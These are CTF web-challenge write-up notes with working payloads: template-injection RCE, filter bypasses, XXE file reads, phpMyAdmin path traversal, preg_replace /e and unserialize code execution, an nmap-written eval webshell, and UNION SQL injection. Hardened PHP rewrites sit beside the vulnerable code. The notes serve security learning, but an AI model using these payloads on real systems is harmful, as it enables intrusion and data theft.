BUU challenge notes, a bit of a jumble, but mostly Web challenges
[BJDCTF2020]Cookie is so stable /flag.php
Template injection is present
{{3*3}} => %20%7b%7b%33%2a%33%7d%7d
{{3*'3'}} => %7b%7b%33%2a%27%33%27%7d%7d
Twig template injection
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("ls")}} => %7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%72%65%67%69%73%74%65%72%55%6e%64%65%66%69%6e%65%64%46%69%6c%74%65%72%43%61%6c%6c%62%61%63%6b%28%22%73%79%73%74%65%6d%22%29%7d%7d%7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%67%65%74%46%69%6c%74%65%72%28%22%6c%73%22%29%7d%7d
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("ls /")}} => %7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%72%65%67%69%73%74%65%72%55%6e%64%65%66%69%6e%65%64%46%69%6c%74%65%72%43%61%6c%6c%62%61%63%6b%28%22%73%79%73%74%65%6d%22%29%7d%7d%7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%67%65%74%46%69%6c%74%65%72%28%22%6c%73%20%2f%22%29%7d%7d
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("cat /flag")}} => %7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%72%65%67%69%73%74%65%72%55%6e%64%65%66%69%6e%65%64%46%69%6c%74%65%72%43%61%6c%6c%62%61%63%6b%28%22%73%79%73%74%65%6d%22%29%7d%7d%7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%67%65%74%46%69%6c%74%65%72%28%22%63%61%74%20%2f%66%6c%61%67%22%29%7d%7d
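The payloads above only work because the cookie value ends up as template source. As an added example (my code, not the challenge's), the vulnerable shape beside the fixed one; it assumes Twig 3 installed through Composer and a cookie named user:

```php
<?php
// Added example, not part of the challenge. A user-controlled value that is
// compiled as a *template* lets {{ ... }} execute; the same value passed as a
// *variable* to a fixed template is rendered as text. Assumes Twig 3.x under
// vendor/autoload.php; the cookie name "user" is an assumption.

require __DIR__ . '/vendor/autoload.php';

$loader = new \Twig\Loader\ArrayLoader([
    'greeting.twig' => 'Hello {{ user }}',     // fixed template; autoescape on
]);
$twig = new \Twig\Environment($loader, ['autoescape' => 'html']);

// Constructed input: the arithmetic probe from the write-up.
$cookie = $_COOKIE['user'] ?? '{{ 3*3 }}';

// Vulnerable shape: the cookie becomes template code, so {{ 3*3 }} prints 9 and
// the _self.env chain above becomes reachable.
function renderAsWritten(\Twig\Environment $twig, string $cookie): string
{
    return $twig->createTemplate('Hello ' . $cookie)->render([]);
}

// Hardened shape: the cookie is data; its braces are never parsed.
function renderHardened(\Twig\Environment $twig, string $cookie): string
{
    return $twig->render('greeting.twig', ['user' => $cookie]);
}

echo renderAsWritten($twig, $cookie), PHP_EOL;   // Hello 9
echo renderHardened($twig, $cookie), PHP_EOL;    // Hello {{ 3*3 }}
```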
[WUSTCTF2020]朴实无华 Directory scan
py -3 dirsearch.py -u http://a14b2b12-84cc-4091-ad39-ccb3ef43d269.node4.buuoj.cn:81/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429
/robots.txt
User-agent: *
Disallow: /fAke_f1agggg.php
hint: Look_at_me: /fl4g.php
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
    $md5=$_GET['md5'];
    if ($md5==md5($md5))
        echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
    else
        die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>
PHP/5.5.38: scientific notation (2e9) bypasses the intval check
md5 loose comparison
0e215962017 => 0e291242476940776845150308577824
Blacklist bypass: ${IFS} replaces the space
?num=2e9&md5=0e215962017&get_flag=ls
?num=2e9&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
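Level 1 is only satisfiable because the same string is parsed twice in two different ways. As an added example (my code, not the challenge's) the check as written beside a single-parse version; the probe values are constructed:

```php
<?php
// Added example, not part of the challenge. Level 1 reads $num twice with two
// numeric interpretations: on PHP 5.x (the page reports PHP/5.5.38) intval("2e9")
// is 2, while "2e9" + 1 is the float 2000000001.0 and intval() of that is
// 2000000001. Since PHP 7.1 intval("2e9") is 2000000000, so this exact payload
// no longer passes there, but the double-parse pattern is still wrong.

// The check as written in the challenge.
function level1AsWritten(string $num): bool
{
    return intval($num) < 2020 && intval($num + 1) > 2021;
}

// Hardened: parse once, as a plain decimal integer, and compare that one value.
// FILTER_VALIDATE_INT rejects exponents, hex, floats and trailing junk, so both
// halves of the condition see the same number and (n < 2020 && n + 1 > 2021)
// is simply unsatisfiable, which is what the author intended.
function level1Hardened(string $num): bool
{
    $n = filter_var($num, FILTER_VALIDATE_INT);
    if ($n === false) {
        return false;
    }
    return $n < 2020 && $n + 1 > 2021;
}

// Constructed probes.
$probes = ['2e9', '2019', '2021', '1e3', '2020'];
printf("%-8s %-12s %-10s %s\n", 'input', 'as_written', 'hardened', 'intval()');
foreach ($probes as $p) {
    printf("%-8s %-12s %-10s %d\n", $p,
        level1AsWritten($p) ? 'pass' : 'fail',
        level1Hardened($p) ? 'pass' : 'fail',
        intval($p));
}
```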
[安洵杯 2019]easy_web The image is delivered through the data: protocol
<img src="data:image/gif;base64,...">
Try decoding the img parameter
Two base64 decodes, then one hex decode
TXpVek5UTTFNbVUzTURabE5qYz0 => MzUzNTM1MmU3MDZlNjc= => 3535352e706e67 => 555.png
Read the source
index.php => 696e6465782e706870 => Njk2ZTY0NjU3ODJlNzA2ODcw => TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
base64 decode
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
md5 strict comparison (a real MD5 collision pair, sent raw)
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
dir is not filtered in the cmd parameter
\ bypasses the regex match
[NCTF2019]Fake XML cookbook XXE, read the flag through the file protocol
XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE username [
  <!ENTITY file SYSTEM "file:///flag">
]>
<user><username>&file;</username><password>0</password></user>
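As an added example (my code, not the challenge's), the login document above parsed on the server side without resolving any entity; it assumes a PHP backend with DOMDocument:

```php
<?php
// Added example, not the challenge's code: parse the login XML from the write-up
// so that an external entity such as file:///flag is never loaded.

// Constructed samples: the XXE document shown above and a benign login.
const SAMPLE_XXE = '<?xml version="1.0" encoding="UTF-8"?>'
    . '<!DOCTYPE username [ <!ENTITY file SYSTEM "file:///flag"> ]>'
    . '<user><username>&file;</username><password>0</password></user>';
const SAMPLE_OK  = '<user><username>alice</username><password>0</password></user>';

function parseLogin(string $xml): ?array
{
    // A login document never needs a DTD: refuse any DOCTYPE/ENTITY before
    // libxml sees it. This is the primary control; the flags below are backup.
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);   // PHP 8 disables external loading by default
    }
    $prev = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // LIBXML_NONET forbids network fetches; LIBXML_NOENT is deliberately absent,
    // so even an internal entity would not be substituted into text nodes.
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        return null;
    }
    $u = $doc->getElementsByTagName('username')->item(0);
    $p = $doc->getElementsByTagName('password')->item(0);
    if ($u === null || $p === null) {
        return null;
    }
    return ['username' => $u->textContent, 'password' => $p->textContent];
}

var_dump(parseLogin(SAMPLE_XXE));   // NULL: DOCTYPE rejected up front
var_dump(parseLogin(SAMPLE_OK));    // array with username "alice"
```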
[强网杯 2019]高明的黑客 /www.tar.gz
Download the source
Need to find a code fragment that is actually usable
There are many usable scripts, for example:
$XnEGfa = $_GET['Efa5BVG'] ?? ' ';
[BJDCTF2020]Mark loves cat Tried the CONTACT page, nothing there
Directory scan
Download the source with GitHack
index.php
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
    $$x = $y;
}
foreach($_GET as $x => $y){
    $$x = $$y;
}
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($is);
}
echo "the flag is: ".$flag;
?>
flag.php
<?php $flag = file_get_contents('/flag'); ?>
exit prints a message and terminates the script: a string argument is printed, an int argument is used as the exit status and not printed, and status 0 means a clean stop
The foreach loops allow variable overwriting
Via GET, when the value of flag equals the name of another parameter (which is not itself flag), the current value of $handsome is printed
When neither GET nor POST carries a flag parameter, the current value of $yds is printed
When the flag parameter (GET or POST) is the string flag, the current value of $is is printed
yds=flag
is=flag&flag=flag
handsome=flag&flag=x&x=flag
[BSidesCF 2020]Had a bad day category=php://filter/read=convert.base64-encode/resource=index.php
include(php://filter/read=convert.base64-encode/resource=index.php.php)
The error shows an extra .php is appended
category=php://filter/read=convert.base64-encode/resource=index
<?php
$file = $_GET['category'];
if(isset($file)) {
    if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
        include ($file . '.php');
    } else{
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
The parameter must contain woofers, meowers or index
Embed one of them inside the wrapper path so the check passes while flag is still what gets read
php://filter/read=convert.base64-encode/woofers/resource=flag
It can also be built like this
category=php://filter/read=convert.base64-encode/resource=woofers/../flag
PCEtLSBDYW4geW91IHJlYWQgdGhpcyBmbGFnPyAtLT4KPD9waHAKIC8vIGZsYWd7MWUwNzY5N2ItYjc1OC00ZDNhLWFhOTEtYmEwNWM0ZDg4MDQ3fQo/Pgo=
<!-- Can you read this flag? --> <?php // flag{1e07697b-b758-4d3a-aa91-ba05c4d88047} ?>
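The substring check is the whole problem here. As an added example (my code, not the challenge's) the check as written beside an allowlist version; the pages/<name>.php layout is an assumption:

```php
<?php
// Added example, not the challenge's code. The original asks only whether a
// word appears somewhere in the string, so both wrapper payloads from the
// write-up pass. An allowlist compares the whole value against fixed names.
// The directory layout pages/<name>.php is assumed.

const PAGES = ['woofers', 'meowers', 'index'];

// The check as written: substring search; strpos($file, "index") is also used
// without !== false, so "index" at offset 0 counts as a miss.
function acceptsAsWritten(string $file): bool
{
    return strpos($file, "woofers") !== false
        || strpos($file, "meowers") !== false
        || strpos($file, "index");
}

// Hardened: exact membership, then a fixed directory and extension, then a
// realpath() check so the resolved file provably sits inside pages/.
function resolvePage(string $category): ?string
{
    if (!in_array($category, PAGES, true)) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/pages/' . $category . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;   // safe to include()
}

// Constructed probes: the legitimate page and the two payloads from the write-up.
foreach ([
    'woofers',
    'php://filter/read=convert.base64-encode/woofers/resource=flag',
    'php://filter/read=convert.base64-encode/resource=woofers/../flag',
] as $probe) {
    printf("%-66s written:%-4s hardened:%s\n", $probe,
        acceptsAsWritten($probe) ? 'pass' : 'fail',
        resolvePage($probe) === null ? 'rejected' : 'include');
}
```

Without a pages/ directory the legitimate probe also reports rejected, since realpath() refuses to resolve a file that does not exist.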
[网鼎杯 2020 朱雀组]phpweb
func=date&p=Y-m-d+h%3Ai%3As+a
Calls date() with the argument “Y-m-d h:i:s a”
Try to read the source by calling readfile, file_get_contents or highlight_file
func=readfile&p=index.php
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>
__destruct
<?php
class Test {
    var $func="system";
    var $p = "cat $(find / -name flag*)";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$a=new Test();
echo serialize($a);
?>
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:25:"cat $(find / -name flag*)";}
A backslash in the function name bypasses the blacklist
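Both bypasses above come from resolving a user-supplied function name. As an added example (my code, not the challenge's), why the denylist fails and what an allowlist of fixed callables looks like; strtoupper stands in for a dangerous function and the map of allowed actions is constructed:

```php
<?php
// Added example, not the challenge's code. phpweb filters names with a denylist
// and passes whatever is left to call_user_func(). Two things slip through: a
// fully qualified name such as "\system" (a different string, the same function)
// and unserialize(), which is not listed and whose Test::__destruct calls
// gettime() again. An allowlist keyed by fixed action names resolves nothing.

// Constructed stand-in for $disable_fun; strtoupper plays the dangerous function.
$denylist = ['strtoupper', 'unserialize'];

function dispatchAsWritten(array $denylist, string $func, string $p): string
{
    $func = strtolower($func);
    if (in_array($func, $denylist)) {        // loose in_array, as in the challenge
        return 'Hacker...';
    }
    if (!is_callable($func)) {
        return '';
    }
    $r = call_user_func($func, $p);          // "\strtoupper" resolves to strtoupper()
    return is_string($r) ? $r : '';
}

// Constructed map: the only actions the page needs, each bound to one callable.
const ALLOWED_FUNCS = ['date' => 'date', 'upper' => 'strtoupper'];

function dispatchHardened(string $action, string $p): ?string
{
    // Exact key match: "\strtoupper", "SYSTEM" or "unserialize" are not keys,
    // so no user-controlled string is ever turned into a function.
    if (!array_key_exists($action, ALLOWED_FUNCS)) {
        return null;
    }
    $r = (ALLOWED_FUNCS[$action])($p);
    return is_string($r) ? $r : null;
}

var_dump(dispatchAsWritten($denylist, 'strtoupper', 'abc'));    // "Hacker..."
var_dump(dispatchAsWritten($denylist, '\strtoupper', 'abc'));   // "ABC": denylist bypassed
var_dump(dispatchHardened('\strtoupper', 'abc'));                // NULL
var_dump(dispatchHardened('upper', 'abc'));                       // "ABC"
```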
[GWCTF 2019]我有一个数据库
The page encoding is broken
Directory scan
phpMyAdmin version is 4.8.1
Found CVE-2018-12613
phpMyAdmin 4.8.1 post-auth getshell
?target=db_sql.php%253f/../../../../../../../../etc/passwd
?target=db_sql.php%253f/../../../../../../../../flag
phpMyAdmin 4.8.1 remote file inclusion vulnerability (CVE-2018-12613)
SELECT '<?php phpinfo()?>';
Check the session ID
?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_5nl1lmmrps8lfjr2l8upr9h9g3
SHOW variables LIKE '%datadir%';
?target=db_sql.php%253f/../../../../../../var/lib/mysql/data/test/test.frm
[BJDCTF2020]ZJCTF,不过如此
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }
    include($file);  //next.php
}
else{
    highlight_file(__FILE__);
}
?>
PHP stream wrappers, file inclusion, preg_replace /e mode
php://input: POST the body I have a dream
data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=
file=php://filter/read=convert.base64-encode/resource=next.php
PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}
CVE-2016-5734: RCE caused by preg_replace
Further reading: preg_replace and code execution (深入研究preg_replace与代码执行)
?\S*=${getFlag()}&cmd=system('cat /flag');
Another approach, from L1ch
?\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}
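The /e modifier is the root cause. As an added example (my code, not the challenge's), complex() rewritten with preg_replace_callback, which has no eval path, plus a bound on the user-supplied pattern:

```php
<?php
// Added example, not the challenge's code. next.php passes the query-string
// *key* into the pattern and uses /e, so the replacement string is eval'd and
// a ${...} subject runs code (PHP 5 only; /e was removed in PHP 7). The
// original, kept as a comment for reference:
//   preg_replace('/(' . $re . ')/ei', 'strtolower("\\1")', $str);

function complex(string $re, string $str): ?string
{
    // The caller also controls the pattern. Pin it to a short literal alphabet
    // so it can neither break out of the delimiters nor backtrack explosively.
    if (!preg_match('/^[A-Za-z0-9_ ]{1,32}$/', $re)) {
        return null;
    }
    return preg_replace_callback(
        '/(' . preg_quote($re, '/') . ')/i',
        static function (array $m): string {
            return strtolower($m[1]);   // an ordinary function call, never eval
        },
        $str
    );
}

// Constructed inputs: the legitimate use, then the attack shape from the write-up.
var_dump(complex('Dream', 'I have a DREAM'));     // "I have a dream"
var_dump(complex('\S*', '${getFlag()}'));         // NULL: pattern rejected
```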
[GXYCTF2019]禁止套娃 Directory scan finds .git
Fetch the source with GitHack
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>
PHP stream wrappers are filtered
(?R)? recursively re-enters the whole pattern, so it matches argument-less function calls nested to any depth
Parameterless RCE
print_r(scandir('.')); lists the current directory
Arguments are not allowed, so current(localeconv()) stands in for '.'
flag.php is the second-to-last entry; after reversing the array, one step forward with next() points at flag.php
print_r(next(array_reverse(scandir(current(localeconv())))));
array_flip swaps keys and values and array_rand returns a random key; repeat until the wanted entry comes up
print_r(array_rand(array_flip(scandir(current(localeconv())))));
readfile(next(array_reverse(scandir(current(localeconv())))));
[BJDCTF2020]The mystery of ip
Spoof the ip through X-Forwarded-For or Client-IP
Smarty SSTI (PHP)
{$smarty.version}
3.1.34-dev-7
{if phpinfo()}{/if}
{php}phpinfo();{/php} (only works with SmartyBC in Smarty 3.1)
X-Forwarded-For: {system('cat /flag')}
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
?>
Pass any ip as host and the nmap command runs
escapeshellarg wraps the string in single quotes and escapes any single quotes already present
escapeshellcmd inserts a backslash before the following characters: & # ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ , \x0A and \xFF. ' and " are escaped only when unpaired. On Windows all of these characters, plus % and !, are replaced by a space
' <?php @eval($_POST["ba2in9a"]);?> -oG ba2in9a.php '
' <?php @eval($_POST["ba2in9a"]);?> -oG ba2in9a.php '
' \<\?php @eval\(\$_POST\[\"ba2in9a\"\]\)\;\?\> -oG ba2in9a.php '
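Two separate mistakes are visible in that source: the sandbox key trusts a request header, and the host is escaped twice and then glued into a shell string. As an added example (my code, not the challenge's), a version that validates the host and runs nmap without a shell; the host grammar is my own and proc_open's array form needs PHP 7.4+:

```php
<?php
// Added example, not the challenge's code. Stacking escapeshellcmd() on top of
// escapeshellarg() is what breaks the quoting: escapeshellarg already yields one
// safe token, and escapeshellcmd then backslashes the quotes inside it, leaving
// an unbalanced quote in the final command line. The fix is to validate the
// value and pass it as an argv element, so no shell ever parses it.

function brokenQuoting(string $host): string
{
    return escapeshellcmd(escapeshellarg($host));   // the pair used in the challenge
}

function validHost(string $host): bool
{
    // An IPv4/IPv6 literal or a DNS name; nothing else reaches nmap. Labels
    // cannot start with '-', so the value can never be read as an nmap option.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($host) <= 253
        && (bool) preg_match('/^(?:' . $label . '\.)*' . $label . '$/i', $host);
}

function sandboxFor(array $server): string
{
    // Only the TCP peer address is trustworthy; X-Forwarded-For is attacker text,
    // which is exactly how the Smarty payload above reaches the page.
    return md5('glzjin' . $server['REMOTE_ADDR']);
}

function runScan(string $host): ?string
{
    if (!validHost($host)) {
        return null;
    }
    // argv form (PHP 7.4+): no shell, so quotes, $( ), ; and "-oG x.php" inside
    // $host would be inert bytes of one argument, and validHost() rejects them anyway.
    $argv = ['nmap', '-T5', '-sT', '-Pn', '--host-timeout', '2', '-F', $host];
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Constructed probes.
var_dump(validHost('127.0.0.1'));                                 // true
var_dump(validHost("' <?php @eval(\$_POST[\"x\"]);?> -oG x.php '"));   // false
var_dump(brokenQuoting("a'b"));                                    // mangled, unbalanced quotes
var_dump(sandboxFor(['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '{$smarty.version}']));
```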
[RoarCTF 2019]Easy Java Username and password are admin / admin888
Nothing useful after login
Check the help page
Throws java.io.FileNotFoundException:{help.docx}
Change the request method to POST
Still nothing useful
From other write-ups: WEB-INF can be read
/web.xml
The servlet-class lives under /WEB-INF/classes
base64 decode to get the flag
[GXYCTF2019]BabyUpload
<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上传文件<input type=\"file\" name=\"uploaded\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
    $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
    $target_path = getcwd() . "/upload/" . md5($_SESSION['user']);
    $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $uploaded_tmp = $_FILES['uploaded']['tmp_name'];
    if(preg_match("/ph/i", strtolower($uploaded_ext))){
        die("后缀名不能有ph!");
    }
    else{
        if ((($_FILES["uploaded"]["type"] == " ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
            $content = file_get_contents($uploaded_tmp);
            if(preg_match("/\<\?/i", $content)){
                die("诶,别蒙我啊,这标志明显还是php啊");
            }
            else{
                mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
                move_uploaded_file($uploaded_tmp, $t_path);
                echo "{$t_path} succesfully uploaded!";
            }
        }
        else{
            die("上传类型也太露骨了吧!");
        }
    }
}
?>
Upload .htaccess
Change the Content-Type
Upload ba2in9a-asp.webp
ba2in9a=show_source('/flag');
[网鼎杯 2018]Fakebook dirsearch finds robots.txt
flag.php
error.php
view.php
db.php
hint: robots.txt reveals user.php.bak
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
After a quick register and login, SQL injection is present; fuzzed with a wordlist
0x7e is filtered
select union
no=-1%20order%20by%201,2,3,4,5%23
Error: there are four columns
no=-1%20union%20select%201,2,3,4%20%23
no hack _
no=-1%20union/**/select%201,2,3,4%20%23
no=-1%20union/**/select%201,@@version_compile_os,3,4%20%23
Linux
no=-1%20union/**/select%201,version(),3,4%20%23
10.2.26-MariaDB-log
no=-1%20union/**/select%201,user(),3,4%20%23
root@localhost
no=-1%20union/**/select%201,database(),3,4%20%23
fakebook
no=-1%20union/**/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()%20%23
users
no=-1%20union/**/select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27%20%23
no,username,passwd,data
no=-1%20union/**/select%201,data,3,4%20from%20users%20%23
O:8:"UserInfo":3:{s:4:"name";s:1:"0";s:3:"age";i:0;s:4:"blog";s:5:"0.com";}
Read file:///var/www/html/flag.php through the stream wrapper
<?php
class UserInfo {
    public $name = "0";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";
}
echo serialize(new UserInfo());
